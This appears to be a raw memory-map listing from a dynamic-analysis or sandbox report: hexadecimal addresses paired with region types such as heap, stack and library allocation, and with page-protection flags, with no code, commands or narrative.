page read and write
5FA000
heap
page read and write
6D15000
trusted library allocation
page read and write
181CCE12000
heap
page read and write
789E000
unkown
page read and write
7C23000
heap
page read and write
1FD195E0000
trusted library allocation
page read and write
22FE000
stack
page read and write
3304000
heap
page read and write
7FFEBFCE0000
trusted library allocation
page read and write
7FFEBFCC0000
trusted library allocation
page read and write
A7EC000
stack
page read and write
4AA7000
stack
page read and write
7E14000
heap
page read and write
C8F7000
unkown
page readonly
23A82DB1000
heap
page read and write
7CCF000
heap
page read and write
640000
unkown
page readonly
ED7D000
unkown
page read and write
7FFEBFB4C000
trusted library allocation
page execute and read and write
956B000
stack
page read and write
8EF000
heap
page read and write
C6B0000
unkown
page readonly
181B2C0C000
heap
page read and write
223E7C19000
heap
page read and write
6AF2000
heap
page read and write
2210000
heap
page read and write
770000
heap
page read and write
2778000
system
page execute and read and write
7FF5144D2000
unkown
page readonly
A9EB000
stack
page read and write
B26A000
stack
page read and write
7FF514B35000
unkown
page readonly
DB2E000
unkown
page read and write
223E7C20000
heap
page read and write
3F50000
unkown
page read and write
2880000
trusted library allocation
page read and write
2F5000
stack
page read and write
AB1C789000
stack
page read and write
7FF51499D000
unkown
page readonly
6A10000
trusted library allocation
page read and write
7C36000
heap
page read and write
4D90000
unkown
page read and write
23A84650000
trusted library allocation
page read and write
C133000
unkown
page readonly
6F0000
unkown
page read and write
7B81000
heap
page read and write
7C1D000
heap
page read and write
1D785800000
trusted library allocation
page read and write
7B4B000
heap
page read and write
7B1B000
heap
page read and write
640000
unkown
page readonly
2890000
unkown
page readonly
863000
heap
page read and write
82B9000
unkown
page read and write
7C21000
heap
page read and write
6AC5000
heap
page read and write
7FF514975000
unkown
page readonly
1DF7AF45000
heap
page read and write
7DE8000
heap
page read and write
7E52000
heap
page read and write
7F0B000
stack
page read and write
775000
heap
page read and write
7FF514500000
unkown
page readonly
7FF5144C7000
unkown
page readonly
7E3D000
heap
page read and write
3FDA000
stack
page read and write
7EE6000
stack
page read and write
530A000
unkown
page read and write
1F19C260000
trusted library section
page readonly
7CC8000
heap
page read and write
76E000
stack
page read and write
7FF514B25000
unkown
page readonly
976E000
stack
page read and write
7B81000
heap
page read and write
1FD1AF30000
trusted library allocation
page read and write
7D62000
heap
page read and write
EA24000
unkown
page read and write
8D0D000
unkown
page read and write
763CA8B000
stack
page read and write
7F8F000
unkown
page read and write
181CCC70000
trusted library allocation
page read and write
6AD5000
heap
page read and write
7FF514645000
unkown
page readonly
24204B50000
trusted library allocation
page read and write
6AE0000
heap
page read and write
7FC000
heap
page read and write
2877000
heap
page read and write
426F000
heap
page read and write
AB1CBFF000
stack
page read and write
7D30000
heap
page read and write
7CF2000
heap
page read and write
7D17000
heap
page read and write
57B2000
system
page read and write
3E0000
unkown
page readonly
16ABBBFC000
heap
page read and write
181CCBB2000
heap
page read and write
193F2A02000
heap
page read and write
5D9000
heap
page read and write
7FFEBFB76000
trusted library allocation
page execute and read and write
1E9DCF02000
heap
page read and write
7E14000
heap
page read and write
7FF514BBD000
unkown
page readonly
7BB9000
heap
page read and write
7E49000
heap
page read and write
4260000
trusted library section
page read and write
F8CE000
heap
page read and write
23E0000
unkown
page readonly
25E9000
stack
page read and write
7FF514B51000
unkown
page readonly
2B10000
unkown
page readonly
4203000
heap
page read and write
8443CFE000
stack
page read and write
30E707B000
stack
page read and write
1DF01546000
trusted library allocation
page read and write
1E9DDC02000
heap
page read and write
6AAA000
heap
page read and write
4CAE000
stack
page read and write
1E9DD78D000
heap
page read and write
422B000
heap
page read and write
7FFEBFA90000
trusted library allocation
page read and write
223E7C15000
heap
page read and write
CE7C000
unkown
page read and write
5280FE000
stack
page read and write
7FFF2E3AD000
unkown
page write copy
1E9DCEE7000
heap
page read and write
7190000
trusted library allocation
page read and write
223E7C15000
heap
page read and write
1D785618000
heap
page read and write
7FFF2E2B5000
unkown
page read and write
10C3A000
heap
page read and write
7FF514AD4000
unkown
page readonly
2700000
system
page execute and read and write
CB7E000
unkown
page read and write
2CCB000
stack
page read and write
9488000
unkown
page read and write
7AEF000
heap
page read and write
24CE000
stack
page read and write
920000
heap
page read and write
1E9DD792000
heap
page read and write
D33000
system
page execute and read and write
181B48F0000
trusted library allocation
page read and write
181CD410000
trusted library allocation
page read and write
5116000
stack
page read and write
7B4B000
heap
page read and write
1D785560000
heap
page read and write
181B2C1A000
heap
page read and write
2AE0000
unkown
page read and write
1F1A0778000
trusted library allocation
page read and write
6B14000
heap
page read and write
107A8000
heap
page read and write
21F8000
stack
page read and write
6CC3000
trusted library allocation
page read and write
480C000
unkown
page read and write
6AC7000
heap
page read and write
7C84000
heap
page read and write
6AA8000
heap
page read and write
1FD19450000
heap
page read and write
7F7C000
unkown
page read and write
7D08000
heap
page read and write
223E7B50000
heap
page read and write
4393000
unkown
page read and write
181B4510000
heap
page readonly
7FFEBFB3C000
trusted library allocation
page execute and read and write
7B63000
heap
page read and write
23A9CF10000
trusted library allocation
page read and write
9F67000
unkown
page readonly
7CFD000
heap
page read and write
CBAF000
unkown
page readonly
CB97000
unkown
page readonly
796C000
stack
page read and write
181CCDB8000
heap
page read and write
7A0F000
stack
page read and write
520000
heap
page read and write
700E000
stack
page read and write
C680000
unkown
page readonly
7B6A000
heap
page read and write
7FFEBFA90000
trusted library allocation
page read and write
A0CC000
unkown
page readonly
7E02000
heap
page read and write
75CA000
unkown
page read and write
28C0000
trusted library allocation
page execute and read and write
25E9000
stack
page read and write
7FF514CAE000
unkown
page readonly
7FF514ABA000
unkown
page readonly
1FD33626000
heap
page read and write
7D5F000
heap
page read and write
7FF514B5B000
unkown
page readonly
A66B000
stack
page read and write
7FFEBFC44000
trusted library allocation
page read and write
181CCE25000
heap
page read and write
4AA7000
stack
page read and write
41C2000
heap
page read and write
7C19000
heap
page read and write
7FF51491D000
unkown
page readonly
181C4CE6000
trusted library allocation
page read and write
1D785680000
heap
page read and write
7CF2000
heap
page read and write
23A84E71000
trusted library allocation
page read and write
1E9DCEB5000
heap
page read and write
7FF5149BD000
unkown
page readonly
1DF7AF45000
heap
page read and write
7B0E000
heap
page read and write
7FF514A57000
unkown
page readonly
EFEA000
stack
page read and write
7FF5148CA000
unkown
page readonly
209E000
stack
page read and write
7FF514C22000
unkown
page readonly
181B2C0E000
heap
page read and write
30E6E7C000
stack
page read and write
A292000
unkown
page readonly
73D3000
trusted library allocation
page read and write
48A9000
heap
page read and write
3F50000
unkown
page read and write
1FD1953F000
heap
page read and write
2F5000
stack
page read and write
7FF514C35000
unkown
page readonly
72E5000
unkown
page readonly
730F000
unkown
page readonly
1E9DD602000
heap
page read and write
5321000
unkown
page read and write
27AF000
heap
page read and write
6AD8000
heap
page read and write
AB1D2FE000
stack
page read and write
FB74000
heap
page read and write
7DF446141000
trusted library allocation
page execute read
7DA5000
heap
page read and write
7FFF295E5000
unkown
page read and write
7DDB000
heap
page read and write
181B60D5000
trusted library allocation
page read and write
7FF514B68000
unkown
page readonly
7B16000
heap
page read and write
7FF514AC7000
unkown
page readonly
DB58000
unkown
page read and write
223E9A7E000
heap
page read and write
27AB000
heap
page read and write
7B4F000
heap
page read and write
7DF8000
heap
page read and write
7D23000
heap
page read and write
7F8D000
unkown
page read and write
7A8E000
stack
page read and write
5300000
unkown
page read and write
7AC5000
heap
page read and write
7B0D000
heap
page read and write
22E1B413000
unkown
page read and write
2A8B000
stack
page read and write
27EA000
system
page read and write
1E9DCF16000
heap
page read and write
7B0D000
heap
page read and write
6AA9000
stack
page read and write
763B5FF000
stack
page read and write
455C000
stack
page read and write
2871000
heap
page read and write
181B4C21000
trusted library allocation
page read and write
7FF514BA9000
unkown
page readonly
9D0000
heap
page read and write
16AD3E46000
heap
page read and write
C45D000
unkown
page readonly
CEFC000
unkown
page read and write
4110000
unkown
page read and write
8235000
unkown
page read and write
7B4F000
heap
page read and write
7FF5147BD000
unkown
page readonly
7DF4460D1000
trusted library allocation
page execute read
1F1A0B02000
heap
page read and write
1FD1C2BE000
trusted library allocation
page read and write
223E98D1000
heap
page read and write
181CCFC0000
trusted library allocation
page read and write
27D2000
unkown
page read and write
429C000
stack
page read and write
7FF514CAB000
unkown
page readonly
7A98000
heap
page read and write
7DF446141000
trusted library allocation
page execute read
1DF78E00000
heap
page read and write
7FF514C29000
unkown
page readonly
2AF0000
unkown
page read and write
7FF514666000
unkown
page readonly
630000
unkown
page readonly
21FA000
stack
page read and write
7DF446140000
trusted library allocation
page readonly
673F000
stack
page read and write
8231000
unkown
page read and write
E0B0000
unkown
page read and write
5367000
unkown
page read and write
7FF514923000
unkown
page readonly
42DF000
trusted library allocation
page execute and read and write
7DF446151000
trusted library allocation
page execute read
23A9CF10000
trusted library allocation
page read and write
7FFEBFE20000
trusted library allocation
page read and write
7FFF2E2F9000
unkown
page readonly
1FD19620000
trusted library allocation
page read and write
293C000
stack
page read and write
97E5000
heap
page read and write
CB9F000
unkown
page readonly
10894000
heap
page read and write
7D17000
heap
page read and write
7D4C000
heap
page read and write
7D5B000
heap
page read and write
7FF514709000
unkown
page readonly
2B5B000
heap
page read and write
9A8E000
unkown
page readonly
7FF514C9C000
unkown
page readonly
7A98000
heap
page read and write
6AF2000
heap
page read and write
CCFA000
unkown
page read and write
7FFF2E40F000
unkown
page readonly
7BE6000
heap
page read and write
7C9E000
heap
page read and write
1E9DD796000
heap
page read and write
7FF514A69000
unkown
page readonly
7FFF29657000
unkown
page readonly
CB68000
unkown
page readonly
7B16000
heap
page read and write
7B5B000
heap
page read and write
4740000
unkown
page readonly
181B2BD0000
heap
page read and write
3304000
heap
page read and write
527DFF000
stack
page read and write
710E000
stack
page read and write
CE97000
unkown
page readonly
1C0000
heap
page read and write
23A84B1D000
trusted library allocation
page read and write
1FD1B010000
trusted library allocation
page read and write
7FFF2E121000
unkown
page execute read
5580000
heap
page read and write
7BDB000
heap
page read and write
223E9925000
heap
page read and write
6B34000
heap
page read and write
7FFEBFCA0000
trusted library allocation
page read and write
1F1A0B06000
heap
page read and write
22E1B250000
heap
page read and write
7FFEBFE30000
trusted library allocation
page read and write
7FFEBFC50000
trusted library allocation
page execute and read and write
4202000
heap
page read and write
7FF514486000
unkown
page readonly
1FD1C4E0000
trusted library allocation
page read and write
AB355FE000
stack
page read and write
1C80DD64000
heap
page read and write
5E8C000
stack
page read and write
7FF51491A000
unkown
page readonly
7FFEBFD60000
trusted library allocation
page read and write
4270000
trusted library section
page read and write
8E0E000
unkown
page read and write
FBB9000
heap
page read and write
293C000
stack
page read and write
1C80BDC6000
heap
page read and write
7BB0000
heap
page read and write
76AB000
unkown
page read and write
7FF514992000
unkown
page readonly
770000
heap
page read and write
6AF9000
heap
page read and write
74EC000
unkown
page readonly
7B5B000
heap
page read and write
C87C000
unkown
page readonly
A24C000
unkown
page readonly
7C2F000
heap
page read and write
F7EE000
heap
page read and write
7FF514B93000
unkown
page readonly
E0D5000
unkown
page read and write
16ABB725000
heap
page read and write
C7C3000
unkown
page readonly
7FFF2E2C3000
unkown
page readonly
7FF514AE8000
unkown
page readonly
181B2C52000
heap
page read and write
223E7D90000
heap
page read and write
7B63000
heap
page read and write
906D000
stack
page read and write
7B1B000
heap
page read and write
7A16000
heap
page read and write
870000
unkown
page readonly
72E5000
unkown
page readonly
4650000
unkown
page readonly
181B44F0000
trusted library allocation
page read and write
7AE0000
heap
page read and write
7FF51476F000
unkown
page readonly
1F19BB18000
heap
page read and write
8206000
unkown
page read and write
F774000
heap
page read and write
109F9000
heap
page read and write
4347000
unkown
page read and write
9F7F000
unkown
page readonly
CC9A000
unkown
page readonly
7FF514B8E000
unkown
page readonly
2890000
unkown
page readonly
2834000
unkown
page read and write
1E9DCE51000
heap
page read and write
740000
stack
page readonly
7FF514C12000
unkown
page readonly
7FFEBFBC0000
trusted library allocation
page execute and read and write
CBAF000
unkown
page readonly
7C1B000
heap
page read and write
6AD5000
heap
page read and write
10BCF000
heap
page read and write
7DE0000
heap
page read and write
1FD195A0000
heap
page read and write
2F5000
stack
page read and write
2B75000
heap
page read and write
20A3F963000
heap
page read and write
107FA000
heap
page read and write
181CD410000
trusted library allocation
page read and write
48D6000
heap
page read and write
1DF78F7C000
heap
page read and write
223E98A4000
heap
page read and write
E740000
unkown
page read and write
16AD4020000
trusted library allocation
page read and write
48D6000
heap
page read and write
3FDA000
stack
page read and write
1DF78E60000
unkown
page read and write
B26A000
stack
page read and write
7C0D000
heap
page read and write
F64D000
heap
page read and write
7515000
unkown
page readonly
2D60000
unclassified section
page execute and read and write
97C6000
heap
page read and write
7DF446140000
trusted library allocation
page readonly
F6EA000
heap
page read and write
7D30000
heap
page read and write
7C13000
heap
page read and write
7C84000
heap
page read and write
826E000
stack
page read and write
970000
unkown
page readonly
414B000
trusted library allocation
page execute and read and write
429C000
stack
page read and write
21CC000
stack
page read and write
7FF514A9B000
unkown
page readonly
7FFF295E3000
unkown
page read and write
23A8503B000
trusted library allocation
page read and write
7BB9000
heap
page read and write
F7B3000
heap
page read and write
7FF51484D000
unkown
page readonly
48F6000
heap
page read and write
4100000
unkown
page read and write
6F08000
stack
page read and write
6B79000
heap
page read and write
7DC6000
heap
page read and write
CAB000
heap
page read and write
7C23000
heap
page read and write
1D7862F0000
trusted library allocation
page read and write
1F1A0A1D000
heap
page read and write
9841000
heap
page read and write
29E7000
system
page read and write
6B79000
heap
page read and write
7FF5146A0000
unkown
page readonly
908C000
unkown
page read and write
2B00000
unkown
page readonly
156BEBA0000
heap
page read and write
7FFF2E3AC000
unkown
page read and write
FBDA000
stack
page read and write
2ED0000
heap
page read and write
7DD4000
heap
page read and write
EB24000
unkown
page read and write
7FFF2E2DA000
unkown
page readonly
16AD3DF0000
trusted library allocation
page read and write
6A50000
trusted library allocation
page read and write
6AA9000
stack
page read and write
7FFEBFBB0000
trusted library allocation
page execute and read and write
75CE000
unkown
page readonly
D66E000
stack
page read and write
1F1A0B04000
heap
page read and write
4830000
heap
page read and write
CC7C000
unkown
page read and write
7B57000
heap
page read and write
A0F5000
unkown
page readonly
CF8B000
stack
page read and write
7FF514709000
unkown
page readonly
6150000
unkown
page read and write
1FD1B010000
trusted library allocation
page read and write
79F0000
heap
page read and write
7FFF2960A000
unkown
page readonly
690000
unkown
page read and write
287E000
stack
page read and write
8240000
unkown
page read and write
69F3000
trusted library allocation
page read and write
3EE0000
unkown
page read and write
7FF514C8D000
unkown
page readonly
F7D000
stack
page read and write
181B2C54000
heap
page read and write
7DD7000
heap
page read and write
7A1E000
heap
page read and write
EBF55FE000
stack
page read and write
1F19C290000
trusted library section
page readonly
840000
heap
page read and write
DB30000
unkown
page read and write
82ED000
stack
page read and write
74C3000
unkown
page readonly
F7B9000
heap
page read and write
181B4F14000
trusted library allocation
page read and write
79EC000
stack
page read and write
6ADA000
heap
page read and write
527000
heap
page read and write
7FFEBFCF0000
trusted library allocation
page read and write
83B1000
unkown
page read and write
596000
stack
page read and write
C9FD000
unkown
page readonly
6A80000
trusted library allocation
page read and write
C75C000
unkown
page readonly
7FF514B5B000
unkown
page readonly
E6D9000
unkown
page read and write
181C4A11000
trusted library allocation
page read and write
7FFEBFCD0000
trusted library allocation
page read and write
10B9A000
heap
page read and write
7FF4F5B34000
unkown
page readonly
7FF514BD4000
unkown
page readonly
7CA3000
heap
page read and write
7FFF295E3000
unkown
page read and write
7E77000
heap
page read and write
70B0000
trusted library allocation
page read and write
6B02000
heap
page read and write
7DE8000
heap
page read and write
558000
heap
page read and write
2CCE000
stack
page read and write
1E9DCE71000
heap
page read and write
181CCFE0000
trusted library allocation
page read and write
7FFF2E3B3000
unkown
page readonly
181CCBE2000
heap
page read and write
23A9CF00000
trusted library allocation
page read and write
C690000
unkown
page readonly
6A10000
trusted library allocation
page read and write
F7DE000
heap
page read and write
775000
heap
page read and write
7FF514B68000
unkown
page readonly
8233000
unkown
page read and write
44CF000
heap
page read and write
4944000
unkown
page read and write
6F08000
stack
page read and write
7FFEBFD30000
trusted library allocation
page read and write
7E0C000
heap
page read and write
670000
unkown
page readonly
C785000
unkown
page readonly
7FFEBFD90000
trusted library allocation
page read and write
8226000
unkown
page read and write
EE6E000
stack
page read and write
20F8C27D000
heap
page read and write
7C0000
stack
page readonly
223E98C0000
heap
page read and write
72F7000
unkown
page readonly
20F8C270000
heap
page read and write
7FF5148FF000
unkown
page readonly
16ABBC30000
heap
page read and write
7FFEBFDE0000
trusted library allocation
page read and write
7C11000
heap
page read and write
1E9DD771000
heap
page read and write
42A0000
unkown
page read and write
23A84F0F000
trusted library allocation
page read and write
70A0000
trusted library allocation
page read and write
48A9000
heap
page read and write
558000
heap
page read and write
7FFF29539000
unkown
page readonly
426F000
heap
page read and write
F7DE000
heap
page read and write
47BF000
heap
page read and write
47B3000
heap
page read and write
7CDA000
heap
page read and write
1196C000
stack
page read and write
220000
unkown
page read and write
150000
unkown
page read and write
5371000
unkown
page read and write
6AA8000
heap
page read and write
1DF7B150000
heap
page read and write
3EF3000
unkown
page read and write
16ABBC21000
trusted library allocation
page read and write
181CCFC1000
trusted library allocation
page read and write
7B91000
heap
page read and write
7FF514A70000
unkown
page readonly
223E9890000
heap
page read and write
900000
heap
page read and write
6B03000
heap
page read and write
6B5E000
heap
page read and write
7CEC000
stack
page read and write
AB358BE000
stack
page read and write
7DF4000
heap
page read and write
1D785600000
trusted library allocation
page read and write
7E5F000
heap
page read and write
F66E000
heap
page read and write
27A8000
unkown
page read and write
7FFEBFC70000
trusted library allocation
page execute and read and write
7FF5146BE000
unkown
page readonly
2370000
heap
page read and write
16AD3E2D000
heap
page read and write
7FFEBFDC0000
trusted library allocation
page read and write
7FF514B5E000
unkown
page readonly
E757000
unkown
page read and write
7DEE000
heap
page read and write
7FF514A51000
unkown
page readonly
4E08000
stack
page read and write
A9EB000
stack
page read and write
181CCC40000
trusted library allocation
page read and write
181CCFD0000
trusted library allocation
page read and write
EA24000
unkown
page read and write
2AE0000
unkown
page read and write
7B26000
heap
page read and write
4911000
heap
page read and write
7B91000
heap
page read and write
7D69000
stack
page read and write
58AC000
stack
page read and write
A8EE000
stack
page read and write
10A0F000
heap
page read and write
1D785680000
heap
page read and write
20F8C1B0000
heap
page read and write
825E000
unkown
page read and write
CE6E000
unkown
page readonly
2276000
stack
page read and write
7FF514AAE000
unkown
page readonly
7FFEBFCE0000
trusted library allocation
page read and write
7FF514650000
unkown
page readonly
1FD337A1000
heap
page read and write
181CD3C0000
trusted library allocation
page read and write
72E000
heap
page read and write
181CCFB0000
trusted library allocation
page read and write
F645000
heap
page read and write
1C80BD58000
heap
page read and write
7DE2000
heap
page read and write
7FFF2E417000
unkown
page readonly
7FF514A04000
unkown
page readonly
951677B000
stack
page read and write
7A9B000
heap
page read and write
20F8C302000
heap
page read and write
7B5B000
heap
page read and write
AB1D0F7000
stack
page read and write
7A6B000
stack
page read and write
7C17000
heap
page read and write
9794000
heap
page read and write
5E37C7B000
stack
page read and write
4000000
trusted library section
page read and write
7B0E000
heap
page read and write
E748000
unkown
page read and write
25B6000
trusted library allocation
page read and write
7FF514CA3000
unkown
page readonly
CDFF000
unkown
page read and write
95165FF000
stack
page read and write
7DE0000
heap
page read and write
7B1B000
heap
page read and write
F8FD000
heap
page read and write
5637000
system
page read and write
1E9DCEEB000
heap
page read and write
856000
heap
page read and write
4650000
unkown
page readonly
2B00000
unkown
page readonly
763BD3D000
stack
page read and write
181CCFB0000
trusted library allocation
page read and write
48F6000
heap
page read and write
29C9000
stack
page read and write
278B000
heap
page read and write
16AD4030000
trusted library allocation
page read and write
CD8C000
unkown
page readonly
7C5E000
heap
page read and write
7FF514C22000
unkown
page readonly
8231000
unkown
page read and write
2ACE000
stack
page read and write
7FFEBFAAD000
trusted library allocation
page execute and read and write
76A1000
unkown
page read and write
AA5000
heap
page read and write
3F0000
unkown
page readonly
763BB7A000
stack
page read and write
56B000
heap
page read and write
7FFF2E3AE000
unkown
page read and write
7B0D000
heap
page read and write
6B02000
heap
page read and write
4740000
unkown
page readonly
48A6000
heap
page read and write
2370000
heap
page read and write
293E000
stack
page read and write
488F000
heap
page read and write
7FF514BE7000
unkown
page readonly
F5EF000
heap
page read and write
2390000
unkown
page read and write
7C13000
heap
page read and write
6B34000
heap
page read and write
68B7BB9000
stack
page read and write
7FFEBFB66000
trusted library allocation
page execute and read and write
7CC8000
heap
page read and write
7D08000
heap
page read and write
71C3000
trusted library allocation
page read and write
6AE0000
heap
page read and write
2AEC000
heap
page read and write
223E98A1000
heap
page read and write
7E53000
heap
page read and write
8F4000
heap
page read and write
9813000
heap
page read and write
8228000
unkown
page read and write
536C000
unkown
page read and write
821A000
system
page read and write
22E1B370000
trusted library allocation
page read and write
951607E000
stack
page read and write
2CCB000
stack
page read and write
7DC5000
heap
page read and write
2AC0000
unkown
page readonly
F7FA000
heap
page read and write
97E5000
heap
page read and write
181CCC60000
trusted library allocation
page read and write
530A000
unkown
page read and write
1F19C060000
trusted library allocation
page read and write
7CC8000
heap
page read and write
7FF514865000
unkown
page readonly
E755000
unkown
page read and write
1FD1C2D3000
trusted library allocation
page read and write
F673000
heap
page read and write
5E37CFD000
stack
page read and write
2350000
unkown
page read and write
7DE2000
heap
page read and write
7FF51499D000
unkown
page readonly
193F2A27000
heap
page read and write
B8E4EFF000
stack
page read and write
7FF514B39000
unkown
page readonly
4D20000
unkown
page read and write
A560000
unkown
page read and write
7D99000
heap
page read and write
23A84E8E000
trusted library allocation
page read and write
D0FB000
unkown
page read and write
2AD0000
heap
page read and write
74EC000
unkown
page readonly
410C000
stack
page read and write
D8C6CFB000
stack
page read and write
AA6B000
stack
page read and write
193F2A4F000
heap
page read and write
4D0000
stack
page readonly
5637000
system
page read and write
4160000
unkown
page read and write
7B44000
heap
page read and write
7FF514CAE000
unkown
page readonly
7FF514775000
unkown
page readonly
7DF446100000
trusted library allocation
page readonly
3F00000
unkown
page write copy
6780000
trusted library allocation
page read and write
AB1D3FE000
stack
page read and write
7A16000
heap
page read and write
69D3000
trusted library allocation
page read and write
4C2E000
stack
page read and write
1E9DD786000
heap
page read and write
7FF51476F000
unkown
page readonly
7D1A000
heap
page read and write
1DF78E50000
unkown
page readonly
72DE000
unkown
page readonly
F8FB000
heap
page read and write
70F5000
trusted library allocation
page read and write
72A1000
unkown
page readonly
7DC1000
heap
page read and write
7FFEBFC80000
trusted library allocation
page execute and read and write
7E00000
heap
page read and write
181B2AB0000
remote allocation
page read and write
7FF514A51000
unkown
page readonly
1F1A08D0000
trusted library allocation
page read and write
7D17000
heap
page read and write
2DC8000
stack
page read and write
26CC000
trusted library allocation
page read and write
2740000
unkown
page read and write
7553000
unkown
page readonly
AA6B000
stack
page read and write
B0EE000
stack
page read and write
C7FD000
unkown
page read and write
8226000
unkown
page read and write
AD6A000
stack
page read and write
30E73FE000
stack
page read and write
181CCFD0000
trusted library allocation
page read and write
3304000
heap
page read and write
D8C6BFB000
stack
page read and write
181CCFA0000
trusted library allocation
page read and write
181B57C2000
trusted library allocation
page read and write
6153000
unkown
page read and write
7DFA000
heap
page read and write
7CE8000
heap
page read and write
9F38000
unkown
page readonly
1F1A07A0000
trusted library allocation
page read and write
1F9E000
stack
page read and write
A185000
unkown
page readonly
4650000
unkown
page readonly
27AB000
heap
page read and write
7C17000
heap
page read and write
7FF5149D4000
unkown
page readonly
7FF514B18000
unkown
page readonly
C028000
stack
page read and write
509D000
stack
page read and write
F7CC000
heap
page read and write
4E6C000
stack
page read and write
A269000
unkown
page readonly
8237000
unkown
page read and write
7227000
unkown
page readonly
6CEB000
stack
page read and write
20F8C229000
heap
page read and write
223E9931000
heap
page read and write
820A000
unkown
page read and write
7B55000
heap
page read and write
23A9CEF0000
trusted library allocation
page read and write
209E000
stack
page read and write
1FD33570000
heap
page read and write
1DF0149C000
trusted library allocation
page read and write
4500000
unkown
page read and write
43B757F000
stack
page read and write
7FF514788000
unkown
page readonly
7FF514975000
unkown
page readonly
2870000
trusted library allocation
page read and write
3304000
heap
page read and write
29B0000
trusted library allocation
page read and write
48C7000
system
page read and write
2A49000
stack
page read and write
7B81000
heap
page read and write
7FF514913000
unkown
page readonly
76E5000
stack
page read and write
73FA000
unkown
page readonly
7B1B000
heap
page read and write
90ED000
stack
page read and write
A560000
unkown
page read and write
763BBBF000
stack
page read and write
7B57000
heap
page read and write
509D000
stack
page read and write
7FFEBFE00000
trusted library allocation
page read and write
3ED3000
unkown
page read and write
920F000
unkown
page read and write
181B4F25000
trusted library allocation
page read and write
7FFEBFB56000
trusted library allocation
page read and write
3470000
heap
page read and write
41BF000
heap
page read and write
7E10000
heap
page read and write
7DC6000
heap
page read and write
16ACBCAF000
trusted library allocation
page read and write
1FD194EC000
heap
page read and write
F674000
heap
page read and write
76EE000
unkown
page read and write
690000
unkown
page read and write
7E52000
heap
page read and write
2AE0000
heap
page read and write
7F8F000
unkown
page read and write
58AC000
stack
page read and write
D18B000
stack
page read and write
48D6000
heap
page read and write
181CD450000
trusted library allocation
page read and write
7B6000
heap
page read and write
20A3F8E0000
heap
page read and write
9D5000
heap
page read and write
7D60000
heap
page read and write
7FF5149E7000
unkown
page readonly
7CBE000
heap
page read and write
42EE000
unkown
page read and write
24CE000
stack
page read and write
7C21000
heap
page read and write
F700000
heap
page read and write
8A5000
heap
page read and write
82C7000
unkown
page read and write
990000
unkown
page readonly
596000
stack
page read and write
520000
heap
page read and write
8240000
unkown
page read and write
20F8C24B000
heap
page read and write
27EA000
system
page read and write
1E9DD75A000
heap
page read and write
900000
unkown
page readonly
2AF9000
heap
page read and write
2210000
heap
page read and write
7EE6000
stack
page read and write
6E33000
unkown
page readonly
3FE0000
unkown
page read and write
629C000
stack
page read and write
F62F000
heap
page read and write
223E7D95000
heap
page read and write
1DF00BC5000
trusted library allocation
page read and write
B74000
heap
page read and write
BE6B000
stack
page read and write
7B1B000
heap
page read and write
7D64000
heap
page read and write
1F1A0A2A000
heap
page read and write
7FF514679000
unkown
page readonly
1DF79040000
heap
page read and write
4650000
unkown
page readonly
150000
heap
page read and write
22E1B370000
trusted library allocation
page read and write
97AD000
heap
page read and write
C8A000
heap
page read and write
7E16000
heap
page read and write
7B5B000
heap
page read and write
7FF514AAE000
unkown
page readonly
4449000
heap
page read and write
7FF514C01000
unkown
page readonly
7FFEBFC89000
trusted library allocation
page read and write
70A0000
trusted library allocation
page read and write
F38A000
heap
page read and write
181CD3F0000
trusted library allocation
page read and write
5AD000
heap
page read and write
223E98A6000
heap
page read and write
6F08000
stack
page read and write
69A0000
trusted library allocation
page read and write
7A6B000
stack
page read and write
6AF6000
heap
page read and write
7CFD000
heap
page read and write
E2AD000
unkown
page read and write
7FF514710000
unkown
page readonly
5AD000
heap
page read and write
21F8000
stack
page read and write
1FD1CC35000
trusted library allocation
page read and write
71A0000
trusted library allocation
page read and write
2310000
unkown
page read and write
B8E4B7C000
stack
page read and write
7FF514706000
unkown
page readonly
2403000
heap
page read and write
43B0000
trusted library allocation
page read and write
7FF5149BD000
unkown
page readonly
6AA8000
heap
page read and write
1E9DD792000
heap
page read and write
7B4F000
heap
page read and write
16ABD0E0000
trusted library allocation
page read and write
2100000
heap
page read and write
E00000
heap
page read and write
7C6A000
heap
page read and write
840000
heap
page read and write
978D000
unkown
page read and write
7FFEBFC51000
trusted library allocation
page read and write
CE97000
unkown
page readonly
6CE3000
trusted library allocation
page read and write
16AB9C90000
heap
page read and write
E7F7000
unkown
page read and write
7FFF29450000
unkown
page readonly
7FF514B51000
unkown
page readonly
7B63000
heap
page read and write
E21B000
unkown
page read and write
7D46000
heap
page read and write
58B0000
unkown
page read and write
3304000
heap
page read and write
1F1A0770000
trusted library allocation
page read and write
4820000
heap
page read and write
D18B000
stack
page read and write
D28E000
stack
page read and write
7E3E000
heap
page read and write
9EAD000
stack
page read and write
7FFEBFCE0000
trusted library allocation
page read and write
900000
unkown
page readonly
1FD33626000
heap
page read and write
7FF5147A0000
unkown
page readonly
7DB3000
heap
page read and write
C80000
heap
page read and write
3EE3000
unkown
page read and write
7E28000
heap
page read and write
156BEBD7000
heap
page read and write
3465000
heap
page read and write
66A0000
trusted library allocation
page read and write
30000
unkown
page read and write
7FFEBFD20000
trusted library allocation
page read and write
7FF5149BD000
unkown
page readonly
7CEF000
heap
page read and write
7AEF000
heap
page read and write
BFEA000
stack
page read and write
E7000
stack
page read and write
1186D000
stack
page read and write
807B000
unkown
page read and write
7FF514655000
unkown
page readonly
2819000
unkown
page read and write
9265000
stack
page read and write
193F2A51000
heap
page read and write
43B7679000
stack
page read and write
7CEA000
heap
page read and write
79F1000
heap
page read and write
7B57000
heap
page read and write
7D5B000
heap
page read and write
84444FD000
stack
page read and write
C87F000
unkown
page read and write
1FD19518000
heap
page read and write
23A84EFE000
trusted library allocation
page read and write
7DE2000
heap
page read and write
7FF514B31000
unkown
page readonly
48A6000
heap
page read and write
7622000
unkown
page readonly
7FF514969000
unkown
page readonly
7FF514434000
unkown
page readonly
916D000
stack
page read and write
6CF0000
trusted library allocation
page read and write
7FFEBFCF0000
trusted library allocation
page read and write
79EC000
stack
page read and write
847000
heap
page read and write
7B4F000
heap
page read and write
7490000
heap
page read and write
414F000
trusted library allocation
page execute and read and write
181CD420000
trusted library allocation
page read and write
7E62000
heap
page read and write
7F78000
unkown
page read and write
7FF514668000
unkown
page readonly
7DC1000
heap
page read and write
7B44000
heap
page read and write
6C0000
unkown
page readonly
7DFF000
heap
page read and write
880B000
unkown
page read and write
7FF514853000
unkown
page readonly
223E7B58000
heap
page read and write
6713000
trusted library allocation
page read and write
CD8C000
unkown
page readonly
F7C6000
heap
page read and write
E759000
unkown
page read and write
7BB9000
heap
page read and write
287A000
heap
page read and write
7A91000
heap
page read and write
181C4BC7000
trusted library allocation
page read and write
435D000
unkown
page read and write
20A3FB15000
heap
page read and write
